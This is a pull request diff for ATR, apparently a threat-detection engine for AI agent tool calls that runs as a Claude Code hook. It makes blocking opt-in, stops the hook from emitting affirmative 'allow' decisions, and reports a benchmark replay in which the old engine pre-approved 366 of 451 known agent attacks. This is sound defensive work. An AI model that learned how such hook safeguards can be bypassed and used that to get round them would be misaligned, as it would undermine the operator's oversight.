### PR TITLE
Make blocking opt-in, and give the detection lane a real entrance

### DIFF
--- a/.github/workflows/publish-on-rules-merge.yml
+++ b/.github/workflows/publish-on-rules-merge.yml
@@ -59,6 +59,28 @@ jobs:
       - name: Run tests
         run: npm test
 
+      # A staged major must be shipped by a human, not swept out as a patch on
+      # the next rules merge. package.json going to 4.0.0 while npm latest is
+      # still 3.x means a breaking change is waiting: `npm version patch` here
+      # would publish it as 4.0.1 with a release note about crystallized rules,
+      # and the release notes for the break would never exist. Blocks until the
+      # major is on npm; then majors match again and the patch train resumes.
+      #
+      # Fails closed: if `npm view` cannot answer, PUBLISHED stays 0.0.0 and the
+      # majors mismatch. Not publishing is the safe direction.
+      - name: Refuse to auto-publish across a staged major
+        run: |
+          LOCAL=$(node -p "require('./package.json').version")
+          PUBLISHED=$(npm view agent-threat-rules version 2>/dev/null || echo "0.0.0")
+          if [ "${LOCAL%%.*}" != "${PUBLISHED%%.*}" ]; then
+            echo "::error::package.json is $LOCAL but npm latest is $PUBLISHED."
+            echo "A major is staged and unpublished. Ship it deliberately"
+            echo "(workflow_dispatch with bump_type, or npm publish by hand),"
+            echo "then automated patch publishing resumes on its own."
+            exit 1
+          fi
+          echo "majors match ($LOCAL vs $PUBLISHED) - patch train may proceed"
+
       - name: Bump version
         id: bump
         run: |

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -54,13 +54,25 @@ All notable changes to ATR will be documented in this file.
 - **Both channels are governed by one switch**: `blocking` in config,
   `ATR_BLOCKING` in the environment, `--blocking` / `--no-blocking` on
   `atr guard`. Default off.
-- **Why**: `SPEC.md` §5.5 ("Engines MUST NOT execute response actions
-  automatically without an explicit configuration directive from the operator"),
-  `spec/atr-method-v1.1.md:164` ("Engines SHOULD NOT auto-block ... without
-  operator policy explicitly enabling it") and `docs/QUALITY-STANDARD.md:228`
-  (blocking only for `maturity: stable` + confidence ≥ 80) all describe a
-  directive that had no implementation: there was no CLI flag, no environment
-  variable and no documented config key by which an operator could express it.
+- **Why**: `SPEC.md` §5.5 (Response) is the engine-wide requirement, quoted
+  whole because it is short enough to be: "Engines MUST NOT execute response
+  actions automatically without an explicit configuration directive from the
+  operator. The `response` field is a recommendation expressed by the Rule
+  author, not a directive to the Engine." That directive had no implementation —
+  no CLI flag, no environment variable, no documented config key by which an
+  operator could express it. This change is that implementation.
+  Two narrower statements point the same way. Neither is the requirement, and
+  neither may be quoted as a general rule:
+  - `spec/atr-method-v1.1.md` §5.6 (Provenance and Trust) sits under §5
+    Signature Method and is scoped to hash matches: "Engines SHOULD NOT
+    auto-block on a hash match without operator policy explicitly enabling it;
+    the default response action SHOULD be `log_alert` until provenance is
+    operator-trusted." An earlier revision of this entry quoted that sentence
+    with "on a hash match" elided, which turned a Signature-Rule SHOULD NOT into
+    an engine-wide one. It is not one. Quote it whole or cite §5.5 instead.
+  - `docs/QUALITY-STANDARD.md` ("For Consumers") restricts blocking to
+    `maturity: stable` with confidence ≥ 80. That is deployment guidance
+    addressed to consumers, not a normative requirement on engines.
 - **Turning blocking on reproduces the previous behaviour exactly.** Verified by
   replaying 3,985 events (3,959 of them the rules' own `true_positives` plus 24
   ordinary developer operations under real Claude Code tool names) through
@@ -78,11 +90,17 @@ All notable changes to ATR will be documented in this file.
   `ATR_LANE` environment variable (honoured by every `ATREngine`, including the
   MCP server), and a `lane` input on the GitHub Action.
 - Resolution order for lane and blocking alike: explicit config > environment >
-  default. An unrecognised value throws / exits non-zero rather than falling back
-  silently — an operator who typed `--lane enfroce` must not be left believing
-  they are enforcing.
-- `atr guard` now prints its posture on stderr
-  (`[atr-guard] lane=hunt blocking=off (advisory: ...)`), and `atr init` says in
+  default. On the command line an unrecognised value is a usage error, never a
+  silent fallback: `atr guard --lane enfroce` prints
+  `Error: Invalid --lane "enfroce". Expected one of: enforce, alert, hunt.` and
+  exits 1, so an operator who typed it is not left believing they are enforcing.
+  An unrecognised value arriving from the *environment* is handled differently —
+  see the `ATR_LANE` / `ATR_BLOCKING` entry under "Changed" above, which is the
+  only place this file describes it.
+- `atr guard` now prints its posture on stderr. The full second line, in the
+  default mode, is
+  `[atr-guard] lane=hunt blocking=off (advisory: detections are reported, nothing is blocked)`;
+  it is preceded by `[atr-guard] Loaded <n> rules from <dir>`. `atr init` says in
   its success message that the installed hook is advisory. "Installed" must never
   read as "enforcing".
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -10,15 +10,77 @@ All notable changes to ATR will be documented in this file.
   enabled.** The Claude Code PreToolUse payload now carries the detection
   (`atr_decision`, `atr_reason`, `matched_rules`, `atr_advisory: true`) and drops
   the `hookSpecificOutput` envelope entirely, so the host applies its own
-  permission flow. The decision is **omitted, not downgraded to `allow`**: in that
-  contract `allow` is affirmative approval that suppresses the host's own prompt,
-  so emitting it would make a hooked session *less* safe than an unhooked one.
-  The whole envelope goes rather than just the decision field, because a partial
-  `hookSpecificOutput` is not a shape the contract is known to accept while extra
-  top-level keys demonstrably are — `atr_decision` and `matched_rules` have
-  shipped alongside it all along.
-  `toClaudeCodePostToolUse` likewise omits `decision: 'block'` (its envelope is
-  kept: an `allow` verdict has always emitted it with no decision inside).
+  permission flow. `toClaudeCodePostToolUse` likewise omits `decision: 'block'`
+  (its envelope is kept: a permissive verdict has always emitted it with no
+  decision inside).
+  The whole envelope goes rather than just the decision field as a **legibility**
+  choice, not a compatibility one. Both shapes are in fact accepted: the
+  hook-output schema in the shipped Claude Code 2.1.76 bundle declares
+  `hookSpecificOutput` optional, its PreToolUse member declares
+  `permissionDecision` optional, and the object is not strict, so unknown
+  top-level keys are stripped rather than rejected — which is also why
+  `atr_decision` and `matched_rules` have shipped alongside it all along. A
+  payload with no envelope simply cannot be misread as a decision that failed to
+  serialise.
+
+- **ATR never emits `permissionDecision: "allow"` — in either mode.** This is
+  wider than the blocking switch and is the part most likely to surprise: turning
+  blocking ON does **not** bring the affirmative decision back. In the PreToolUse
+  contract `allow` is not neutral; it is an approval that suppresses the host's
+  own permission prompt, so a hooked session would permit *more* than an unhooked
+  one on every operation ATR simply had not looked for. "No rule matched" is ATR
+  having nothing to say, and the way to say nothing on that channel is to omit
+  the field. A decision is therefore emitted only for the two verdicts that
+  **restrain** — `deny` and `ask` — and only when blocking is on. Everything else
+  travels in `atr_decision` / `atr_reason` / `matched_rules`.
+  Consequence for the payload shape: with blocking ON and a permissive verdict
+  the `hookSpecificOutput` envelope is dropped too, exactly as in advisory mode.
+  `atr_advisory: true` marks the *mode*, not the verdict, so it is the one key
+  that distinguishes the two:
+
+  ```console
+  $ printf '%s\n' '{"hook":"PreToolUse","tool_name":"Bash","tool_input":{"command":"ls -la"},"session_id":"s1"}' \
+      | npx tsx src/cli.ts guard --blocking 2>/dev/null
+  {"atr_hook_event":"PreToolUse","atr_decision":"allow","atr_reason":"ALLOW: High-Risk Tool Invocation Without Human Confirmation [low/71% confidence] (1 rule matched)","matched_rules":["ATR-2026-00099"]}
+  ```
+
+  The PostToolUse contract needed no equivalent change: it has exactly one
+  sentinel, `decision: 'block'`, and the absence of the key *is* the
+  pass-through. There is no value that function could set to suppress a host
+  behaviour.
+- **BREAKING for embedders: the library no longer reads the environment at all.**
+  `ATR_LANE` and `ATR_BLOCKING` are **CLI-only**. `ATREngine`, `ActionExecutor`
+  and `HookHandler` take their posture from explicit config or the built-in
+  default, and nothing else. If you embedded ATR and were relying on a variable
+  in the ambient environment to select a lane, **that no longer works** — pass
+  `new ATREngine({ lane })` instead.
+
+  ```ts
+  // With ATR_LANE=enforce ATR_BLOCKING=1 exported in the environment:
+  new ATREngine({ rulesDir }).getLane()          // 'hunt'  (was: 'enforce')
+  new ActionExecutor({ adapter }).isBlocking()   // false
+  new HookHandler({ engine, executor }).isBlocking() // false
+  ```
+
+  Ambient configuration crosses trust boundaries invisibly. A `new ATREngine()`
+  inside a VS Code extension, a Mastra pipeline, or the `/openshell-filter`,
+  `/nemoclaw-preflight` and `/mcp` entry points never asked to be reconfigured by
+  a shell profile — and because `enforce` is a *valid* value, the old behaviour
+  produced no warning at all while narrowing those callers to `maturity: stable`
+  rules only.
+  The guarantee is **structural, not a convention**: `resolveLane` and
+  `resolveBlocking` now require an `EnvSource` argument with no `process.env`
+  default, so there is no overload that can fall through to the environment. Two
+  new library-facing helpers, `laneFromConfig()` and `blockingFromConfig()`, pass
+  a frozen empty environment; the new `resolveEnforcementPolicy()` is the single
+  function in the package that touches `process.env`, and `src/cli.ts` is its
+  only caller. `resolveLaneOrWarn`, `resolveBlockingOrWarn` and
+  `resetEnforcementWarnings` are **removed**.
+  One deliberate exception: `src/mcp-server.ts` reads `ATR_LANE` when the file is
+  the process entry point, because that makes it a CLI rather than a library. An
+  importer of the `./mcp` subpath does not reach that branch and gets its lane
+  from the explicit option.
+
 - **Scope limit, stated so the headline is not read wider than it is.** This
   covers the two channels the engine itself drives: the Claude Code hook
   contract and `ActionExecutor`. It does NOT cover the framework adapters, which
@@ -28,18 +90,63 @@ All notable changes to ATR will be documented in this file.
   both default `ATR_MIN_SEVERITY` to `high`. Bringing those under the same switch
   is a separate behaviour decision and is not made here.
 
-- **An unrecognised `ATR_LANE` or `ATR_BLOCKING` warns on stderr and falls back
-  to the safe default.** `main` did not read either variable, so a typo was
-  previously inert. An earlier revision of this branch threw from the
-  constructor instead, which measured badly: `ATR_BLOCKING=enabled npx atr
-  guard` exited 1 with an empty stdout and no guard running — landing hardest on
-  the operator trying to turn enforcement ON — and a stray `ATR_LANE` in a shell
-  profile crashed the VS Code extension on activation. Neither process asked to
-  read the environment. An explicit bad argument (`new ATREngine({ lane })`)
-  still throws, because that is the caller's own bug rather than ambient state.
-  The warning names the variable, the bad value, and — for `ATR_BLOCKING` —
-  states outright that enforcement is NOT enabled; it is emitted once per
-  distinct value per process.
+- **An unrecognised `ATR_LANE` or `ATR_BLOCKING` warns on stderr, falls back to
+  the safe default, and the guard keeps running (exit 0).** `main` did not read
+  either variable, so a typo was previously inert. An earlier revision of this
+  branch threw from the constructor instead, which measured badly:
+  `ATR_BLOCKING=enabled npx atr guard` exited 1 with an empty stdout and no guard
+  running — landing hardest on the operator trying to turn enforcement ON.
+  `atr init` installs `atr guard` as a PreToolUse **command hook**, and Claude
+  Code 2.1.76 maps any exit status other than 0 or 2 to a non-blocking error: it
+  runs the tool anyway, hands the model nothing, and renders only
+  `<hookName> hook error` **without** the captured stderr. Exiting would have
+  discarded every detection and still not told the operator why; status 2, the
+  only loud one, blocks the tool outright, which a stray shell variable must
+  never do. The warnings are printed once, at startup, by the CLI — they are not
+  deduplicated per value, and the `resolveLaneOrWarn` / `resolveBlockingOrWarn` /
+  `resetEnforcementWarnings` helpers that did that are gone. Verbatim, prefixed
+  `[atr]` (red on a TTY):
+
+  ```text
+  [atr] Invalid ATR_LANE="enfroce". Expected one of: enforce, alert, hunt. Falling back to lane "hunt". Detection still runs; this only changes which maturities may fire.
+  [atr] Invalid ATR_BLOCKING="enabled". Expected one of: 1/true/yes/on or 0/false/no/off. Falling back to blocking=false. If you meant to enable enforcement, it is NOT enabled.
+  ```
+
+  A bad **flag** still exits 1 — `atr guard --lane enfroce` and
+  `atr scan --lane enfroce <target>` both print
+  `Error: Invalid --lane "enfroce". Expected one of: enforce, alert, hunt.` and
+  stop. A flag is typed at a prompt by someone who will see the exit code; an
+  inherited variable is not. An explicit bad argument
+  (`new ATREngine({ lane: 'enfroce' })`) still throws for the same reason.
+
+- **An unreadable `ATR_LANE` forces blocking off, even against an explicit
+  `--blocking`.** Falling back to `hunt` while blocking stays on is the one
+  degraded posture that is *more* dangerous than the one requested: the operator
+  asked to enforce on `maturity: stable` rules only and would instead enforce on
+  every maturity. `--blocking` says "you may block", not "block on a lane I never
+  chose". `ATR_LANE=enfroce atr guard --blocking` therefore exits 0 in advisory
+  mode, having printed the lane warning above plus:
+
+  ```text
+  [atr] Blocking disabled: ATR_LANE could not be read, and blocking on the fallback lane "hunt" would enforce on more rule maturities than you asked for. Fix ATR_LANE to re-enable enforcement.
+  ```
+
+- **Both switches now trim whitespace and ignore case, identically.** They were
+  asymmetric: `ATR_BLOCKING=ON` worked while `ATR_LANE=ENFORCE` did not, so the
+  pair `ATR_LANE=ENFORCE ATR_BLOCKING=ON` turned blocking on **and** silently
+  widened the lane to `hunt` — the operator asked for the narrowest enforcement
+  posture and got the broadest one. `ATR_LANE=ENFORCE`, `ATR_LANE=" alert "` and
+  `--lane Alert` are all honoured now.
+
+- **A non-boolean explicit `blocking` throws instead of enabling blocking.**
+  `new ActionExecutor({ adapter, blocking: "false" })` and
+  `new HookHandler({ engine, executor, blocking: "false" })` previously turned
+  blocking **on**, because every non-empty string is truthy — reading, to their
+  author, as an explicit "off". Both now raise
+  `TypeError: Invalid blocking value "false" (string). Expected a boolean.` The
+  lane path validated its explicit value from the start; a switch that fails
+  toward *more* enforcement was the wrong asymmetry to leave in place. This is
+  BREAKING for any JavaScript or JSON-config caller that was passing a string.
 
 - **`ActionExecutor` no longer dispatches response actions above the `observe`
   blast-radius tier unless blocking is enabled.** `alert` / `snapshot` /
@@ -51,9 +158,10 @@ All notable changes to ATR will be documented in this file.
   This closes the dual-channel contradiction where a benign
   `Bash{command:"ls -la"}` produced `permissionDecision: "allow"` while the
   executor really invoked `blockTool` on the adapter.
-- **Both channels are governed by one switch**: `blocking` in config,
-  `ATR_BLOCKING` in the environment, `--blocking` / `--no-blocking` on
-  `atr guard`. Default off.
+- **Both channels are governed by one switch**: the `blocking` config field on
+  `ActionExecutor` and `HookHandler` for embedders, and `--blocking` /
+  `--no-blocking` or `ATR_BLOCKING` on `atr guard` for the CLI. Default off. The
+  environment variable reaches the CLI only — see the embedder entry above.
 - **Why**: `SPEC.md` §5.5 (Response) is the engine-wide requirement, quoted
   whole because it is short enough to be: "Engines MUST NOT execute response
   actions automatically without an explicit configuration directive from the
@@ -73,36 +181,89 @@ All notable changes to ATR will be documented in this file.
   - `docs/QUALITY-STANDARD.md` ("For Consumers") restricts blocking to
     `maturity: stable` with confidence ≥ 80. That is deployment guidance
     addressed to consumers, not a normative requirement on engines.
-- **Turning blocking on reproduces the previous behaviour exactly.** Verified by
-  replaying 3,985 events (3,959 of them the rules' own `true_positives` plus 24
-  ordinary developer operations under real Claude Code tool names) through
-  `HookHandler` → `evaluateWithVerdict` → `ActionExecutor` on `origin/main` and
-  on this branch with `--blocking`: the two JSONL transcripts are byte-identical.
-- **Detection is unchanged in both modes**: same `matches`, `matchCount`,
-  `highestSeverity`, `highestConfidence` and reason string on all 3,985 events
-  (0 differences).
+- **Turning blocking on reproduces the previous behaviour on every verdict that
+  restrains — and only those.** An earlier revision of this entry claimed the
+  two transcripts were "byte-identical". They are not, and the difference is the
+  point of the change. Measured by replaying the 850 samples of
+  `data/pint-benchmark/pint-corpus.json` as **850 hook events per hook type**
+  (one JSON line in, one JSON line out) through `atr guard`'s stdio loop —
+  `HookHandler` → `evaluateWithVerdict` → `ActionExecutor` — on the pre-change
+  merge-base `994b01b2b` with no flags, and on `b9da8d710` with `--blocking`.
+  The rule corpus is byte-for-byte identical at those two commits
+  (`git diff --name-only 994b01b2b..b9da8d710 -- rules` is empty), so every
+  difference below is the contract change and nothing else.
+
+  | Hook | Events | Byte-identical output lines | Differing |
+  |---|---:|---:|---:|
+  | `PostToolUse` | 850 | **850** | 0 |
+  | `PreToolUse` | 850 | 85 | **765** |
+
+  `PostToolUse` is unchanged outright. On `PreToolUse` the 85 identical lines are
+  exactly the events where the baseline emitted a decision that **restrains** —
+  81 `deny` + 4 `ask` — and all 85 of those match byte for byte. The 765
+  differing lines are every event where the baseline emitted
+  `permissionDecision: "allow"`; on this branch all 765 carry no
+  `hookSpecificOutput` key at all.
+  Restricted to the 451 samples labelled `label: true` (the attacks), the same
+  replay gives 85 identical / 366 differing — i.e. **ATR was affirmatively
+  pre-approving 366 of 451 known attacks**, including under
+  `--lane enforce --blocking`, where no `stable` rule matched and the payload
+  was `{"permissionDecision":"allow","permissionDecisionReason":"No rules matched."}`.
+
+- **Detection is unchanged in both modes.** Over the same 850 × 2 events,
+  `matched_rules` is identical to the baseline on 850/850 for both hooks in both
+  modes, and `atr_decision` equals the baseline's internal decision on 850/850.
+  Blocking changes what the engine *does*, never what it *sees*.
 
 ### Added — the detection lane finally has an entrance
 
 - `ATREngineConfig.lane` existed and worked but no shipped code path ever set it
   and no user-facing entry point could, so `hunt` was the only reachable setting.
   Added `--lane <enforce|alert|hunt>` to `atr guard` and `atr scan`, the
-  `ATR_LANE` environment variable (honoured by every `ATREngine`, including the
-  MCP server), and a `lane` input on the GitHub Action.
-- Resolution order for lane and blocking alike: explicit config > environment >
-  default. On the command line an unrecognised value is a usage error, never a
+  `ATR_LANE` environment variable, and a `lane` input on the GitHub Action.
+  `ATR_LANE` is read by the **CLI surfaces only** — `atr guard`, `atr scan`, and
+  `src/mcp-server.ts` when it is the process entry point. It is *not* honoured by
+  every `ATREngine`: an engine constructed by an embedder ignores it entirely.
+  See the library/environment entry under "Changed" above.
+- **There is no single resolution order any more, and conflating the two was the
+  bug.** They are different chains on different surfaces:
+
+  | Surface | Chain |
+  |---|---|
+  | Library (`ATREngine` / `ActionExecutor` / `HookHandler`) | explicit config **>** built-in default. The environment is not consulted. |
+  | CLI (`atr guard`, `atr scan`) | flag **>** environment variable **>** built-in default. There is no programmatic config on this surface. |
+
+  The old "explicit programmatic config > environment > default" described a
+  chain that exists on neither surface.
+  On the command line an unrecognised `--lane` value is a usage error, never a
   silent fallback: `atr guard --lane enfroce` prints
   `Error: Invalid --lane "enfroce". Expected one of: enforce, alert, hunt.` and
   exits 1, so an operator who typed it is not left believing they are enforcing.
+  (`--blocking` / `--no-blocking` take no value; supplying one, as in
+  `--blocking=maybe`, is not recognised as the flag and leaves the switch to the
+  environment and then the default — it does not error.)
   An unrecognised value arriving from the *environment* is handled differently —
   see the `ATR_LANE` / `ATR_BLOCKING` entry under "Changed" above, which is the
   only place this file describes it.
-- `atr guard` now prints its posture on stderr. The full second line, in the
-  default mode, is
-  `[atr-guard] lane=hunt blocking=off (advisory: detections are reported, nothing is blocked)`;
-  it is preceded by `[atr-guard] Loaded <n> rules from <dir>`. `atr init` says in
-  its success message that the installed hook is advisory. "Installed" must never
-  read as "enforcing".
+- `atr guard` now prints its posture on stderr, preceded by
+  `[atr-guard] Loaded <n> rules from <dir>`. Both modes carry a parenthetical,
+  and the blocking one names the limit rather than claiming enforcement outright:
+
+  ```text
+  [atr-guard] lane=hunt blocking=off (advisory: detections are reported, nothing is blocked)
+  [atr-guard] lane=hunt blocking=on (deny/ask only; never approves a tool call)
+  ```
+
+  `atr init` says in its success message that the installed hook is advisory.
+  "Installed" must never read as "enforcing".
+
+- **Provenance of the console output quoted in this entry.** Every payload,
+  warning and posture line above is captured stdout/stderr from
+  `fix/review-never-affirmative-allow` at `b9da8d710`, pasted unedited apart from
+  stripping the ANSI colour codes on the `[atr]` warnings and rewriting the
+  absolute rules path. This branch carries the documentation; `b9da8d710` carries
+  the implementation. The commands reproduce these outputs once both have landed
+  — not before.
 
 ### Fixed
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -72,14 +72,19 @@ All notable changes to ATR will be documented in this file.
   `resolveBlocking` now require an `EnvSource` argument with no `process.env`
   default, so there is no overload that can fall through to the environment. Two
   new library-facing helpers, `laneFromConfig()` and `blockingFromConfig()`, pass
-  a frozen empty environment; the new `resolveEnforcementPolicy()` is the single
-  function in the package that touches `process.env`, and `src/cli.ts` is its
+  a frozen empty environment; the new `resolveEnforcementPolicy()` is the only
+  function that reads `process.env` **for these two switches**, and `src/cli.ts` is its
   only caller. `resolveLaneOrWarn`, `resolveBlockingOrWarn` and
   `resetEnforcementWarnings` are **removed**.
   One deliberate exception: `src/mcp-server.ts` reads `ATR_LANE` when the file is
   the process entry point, because that makes it a CLI rather than a library. An
   importer of the `./mcp` subpath does not reach that branch and gets its lane
   from the explicit option.
+  Not the only function in the package that reads the environment: eleven files
+  under `src/` do, and two of them — `adapters/openshell-filter.ts` and
+  `adapters/nemoclaw-preflight.ts` — read `ATR_MIN_SEVERITY` and still block by
+  default, as the scope limit below records. Reproduce with
+  `grep -rl "process\\.env" src/`.
 
 - **Scope limit, stated so the headline is not read wider than it is.** This
   covers the two channels the engine itself drives: the Claude Code hook
@@ -212,8 +217,16 @@ All notable changes to ATR will be documented in this file.
   Restricted to the 451 samples labelled `label: true` (the attacks), the same
   replay gives 85 identical / 366 differing — i.e. **ATR was affirmatively
   pre-approving 366 of 451 known attacks**, including under
-  `--lane enforce --blocking`, where no `stable` rule matched and the payload
-  was `{"permissionDecision":"allow","permissionDecisionReason":"No rules matched."}`.
+  the `enforce` lane, where no `stable` rule matched and the whole payload was
+
+  ```json
+  {"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"allow","permissionDecisionReason":"No rules matched."},"atr_decision":"allow"}
+  ```
+
+  captured on 994b01b2b through the TypeScript API rather than the CLI, because
+  the predecessor had no `--lane` flag to set the lane with. The excerpt an
+  earlier revision quoted here was the inner `hookSpecificOutput` object, not
+  the payload.
 
 - **Detection is unchanged in both modes.** Over the same 850 × 2 events,
   `matched_rules` is identical to the baseline on 850/850 for both hooks in both

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -8,12 +8,17 @@ All notable changes to ATR will be documented in this file.
 
 - **`atr guard` no longer emits a `permissionDecision` unless blocking is
   enabled.** The Claude Code PreToolUse payload now carries the detection
-  (`atr_decision`, `atr_reason`, `matched_rules`, `atr_advisory: true`) and omits
-  `hookSpecificOutput.permissionDecision` entirely, so the host applies its own
-  permission flow. The field is **omitted, not downgraded to `allow`**: in that
+  (`atr_decision`, `atr_reason`, `matched_rules`, `atr_advisory: true`) and drops
+  the `hookSpecificOutput` envelope entirely, so the host applies its own
+  permission flow. The decision is **omitted, not downgraded to `allow`**: in that
   contract `allow` is affirmative approval that suppresses the host's own prompt,
   so emitting it would make a hooked session *less* safe than an unhooked one.
-  `toClaudeCodePostToolUse` likewise omits `decision: 'block'`.
+  The whole envelope goes rather than just the decision field, because a partial
+  `hookSpecificOutput` is not a shape the contract is known to accept while extra
+  top-level keys demonstrably are — `atr_decision` and `matched_rules` have
+  shipped alongside it all along.
+  `toClaudeCodePostToolUse` likewise omits `decision: 'block'` (its envelope is
+  kept: an `allow` verdict has always emitted it with no decision inside).
 - **`ActionExecutor` no longer dispatches response actions above the `observe`
   blast-radius tier unless blocking is enabled.** `alert` / `snapshot` /
   `shadow` / `escalate` run exactly as before; `block_input` / `block_output` /

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,69 @@ All notable changes to ATR will be documented in this file.
 
 ## [Unreleased]
 
+### Changed — blocking is now opt-in (BREAKING for anyone relying on the old default)
+
+- **`atr guard` no longer emits a `permissionDecision` unless blocking is
+  enabled.** The Claude Code PreToolUse payload now carries the detection
+  (`atr_decision`, `atr_reason`, `matched_rules`, `atr_advisory: true`) and omits
+  `hookSpecificOutput.permissionDecision` entirely, so the host applies its own
+  permission flow. The field is **omitted, not downgraded to `allow`**: in that
+  contract `allow` is affirmative approval that suppresses the host's own prompt,
+  so emitting it would make a hooked session *less* safe than an unhooked one.
+  `toClaudeCodePostToolUse` likewise omits `decision: 'block'`.
+- **`ActionExecutor` no longer dispatches response actions above the `observe`
+  blast-radius tier unless blocking is enabled.** `alert` / `snapshot` /
+  `shadow` / `escalate` run exactly as before; `block_input` / `block_output` /
+  `block_tool` / `reduce_permissions` / `reset_context` / `quarantine_session` /
+  `kill_agent` are recorded as suppressed and the adapter is never called. The
+  tier ladder is read from `src/quality/action-eligibility.ts` — this change does
+  not introduce a second classification of what is destructive.
+  This closes the dual-channel contradiction where a benign
+  `Bash{command:"ls -la"}` produced `permissionDecision: "allow"` while the
+  executor really invoked `blockTool` on the adapter.
+- **Both channels are governed by one switch**: `blocking` in config,
+  `ATR_BLOCKING` in the environment, `--blocking` / `--no-blocking` on
+  `atr guard`. Default off.
+- **Why**: `SPEC.md` §5.5 ("Engines MUST NOT execute response actions
+  automatically without an explicit configuration directive from the operator"),
+  `spec/atr-method-v1.1.md:164` ("Engines SHOULD NOT auto-block ... without
+  operator policy explicitly enabling it") and `docs/QUALITY-STANDARD.md:228`
+  (blocking only for `maturity: stable` + confidence ≥ 80) all describe a
+  directive that had no implementation: there was no CLI flag, no environment
+  variable and no documented config key by which an operator could express it.
+- **Turning blocking on reproduces the previous behaviour exactly.** Verified by
+  replaying 3,985 events (3,959 of them the rules' own `true_positives` plus 24
+  ordinary developer operations under real Claude Code tool names) through
+  `HookHandler` → `evaluateWithVerdict` → `ActionExecutor` on `origin/main` and
+  on this branch with `--blocking`: the two JSONL transcripts are byte-identical.
+- **Detection is unchanged in both modes**: same `matches`, `matchCount`,
+  `highestSeverity`, `highestConfidence` and reason string on all 3,985 events
+  (0 differences).
+
+### Added — the detection lane finally has an entrance
+
+- `ATREngineConfig.lane` existed and worked but no shipped code path ever set it
+  and no user-facing entry point could, so `hunt` was the only reachable setting.
+  Added `--lane <enforce|alert|hunt>` to `atr guard` and `atr scan`, the
+  `ATR_LANE` environment variable (honoured by every `ATREngine`, including the
+  MCP server), and a `lane` input on the GitHub Action.
+- Resolution order for lane and blocking alike: explicit config > environment >
+  default. An unrecognised value throws / exits non-zero rather than falling back
+  silently — an operator who typed `--lane enfroce` must not be left believing
+  they are enforcing.
+- `atr guard` now prints its posture on stderr
+  (`[atr-guard] lane=hunt blocking=off (advisory: ...)`), and `atr init` says in
+  its success message that the installed hook is advisory. "Installed" must never
+  read as "enforcing".
+
+### Fixed
+
+- `src/hook-handler.ts` carried two contradictory comments about failure
+  behaviour: the module header said fail-open, an inline comment in
+  `startStdioLoop` said the error path "fail-closes to a deny". The header was
+  right — `failOpen` defaults to `true` in both the constructor and the CLI. The
+  inline comment is corrected; the behaviour is unchanged.
+
 ### Fixed — published benchmark numbers
 
 - **Withdrew two garak figures that no measurement file backed.** From 2026-08-04

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -142,9 +142,14 @@ All notable changes to ATR will be documented in this file.
   `new ActionExecutor({ adapter, blocking: "false" })` and
   `new HookHandler({ engine, executor, blocking: "false" })` previously turned
   blocking **on**, because every non-empty string is truthy — reading, to their
-  author, as an explicit "off". Both now raise
-  `TypeError: Invalid blocking value "false" (string). Expected a boolean.` The
-  lane path validated its explicit value from the start; a switch that fails
+  author, as an explicit "off". Both now raise a `TypeError`, whose message in
+  full is:
+
+  ```text
+  Invalid blocking value "false" (string). Expected a boolean. Note that any non-empty string, including "false", would otherwise enable blocking.
+  ```
+
+  The lane path validated its explicit value from the start; a switch that fails
   toward *more* enforcement was the wrong asymmetry to leave in place. This is
   BREAKING for any JavaScript or JSON-config caller that was passing a string.
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -80,11 +80,12 @@ All notable changes to ATR will be documented in this file.
   the process entry point, because that makes it a CLI rather than a library. An
   importer of the `./mcp` subpath does not reach that branch and gets its lane
   from the explicit option.
-  Not the only function in the package that reads the environment: eleven files
-  under `src/` do, and two of them — `adapters/openshell-filter.ts` and
-  `adapters/nemoclaw-preflight.ts` — read `ATR_MIN_SEVERITY` and still block by
-  default, as the scope limit below records. Reproduce with
-  `grep -rl "process\\.env" src/`.
+  Not the only function in the package that reads the environment: ten files
+  under `src/` read it in code, and two of them — `adapters/openshell-filter.ts`
+  and `adapters/nemoclaw-preflight.ts` — read `ATR_MIN_SEVERITY` and still block
+  by default, as the scope limit below records. `grep -rl "process\.env" src/`
+  returns eleven rather than ten: `src/index.ts` only names the variable in a
+  comment. An earlier revision of this paragraph published that grep count.
 
 - **Scope limit, stated so the headline is not read wider than it is.** This
   covers the two channels the engine itself drives: the Claude Code hook

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -19,6 +19,22 @@ All notable changes to ATR will be documented in this file.
   shipped alongside it all along.
   `toClaudeCodePostToolUse` likewise omits `decision: 'block'` (its envelope is
   kept: an `allow` verdict has always emitted it with no decision inside).
+- **Scope limit, stated so the headline is not read wider than it is.** This
+  covers the two channels the engine itself drives: the Claude Code hook
+  contract and `ActionExecutor`. It does NOT cover the framework adapters, which
+  read their own severity floor and still block out of the box —
+  `src/adapters/mastra.ts` defaults `blockSeverities` to `["critical", "high"]`,
+  and `src/adapters/openshell-filter.ts` and `src/adapters/nemoclaw-preflight.ts`
+  both default `ATR_MIN_SEVERITY` to `high`. Bringing those under the same switch
+  is a separate behaviour decision and is not made here.
+
+- **An unrecognised `ATR_LANE` now throws instead of being ignored.** `main` did
+  not read the variable at all, so a typo was previously silent; it is now a
+  `TypeError` from the `ATREngine` constructor. Failing loud is deliberate — a
+  misspelled lane that silently falls back to `hunt` is the failure mode this
+  release exists to remove — but it is a behaviour change for any environment
+  that happens to have the variable set to something else.
+
 - **`ActionExecutor` no longer dispatches response actions above the `observe`
   blast-radius tier unless blocking is enabled.** `alert` / `snapshot` /
   `shadow` / `escalate` run exactly as before; `block_input` / `block_output` /

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -28,12 +28,18 @@ All notable changes to ATR will be documented in this file.
   both default `ATR_MIN_SEVERITY` to `high`. Bringing those under the same switch
   is a separate behaviour decision and is not made here.
 
-- **An unrecognised `ATR_LANE` now throws instead of being ignored.** `main` did
-  not read the variable at all, so a typo was previously silent; it is now a
-  `TypeError` from the `ATREngine` constructor. Failing loud is deliberate — a
-  misspelled lane that silently falls back to `hunt` is the failure mode this
-  release exists to remove — but it is a behaviour change for any environment
-  that happens to have the variable set to something else.
+- **An unrecognised `ATR_LANE` or `ATR_BLOCKING` warns on stderr and falls back
+  to the safe default.** `main` did not read either variable, so a typo was
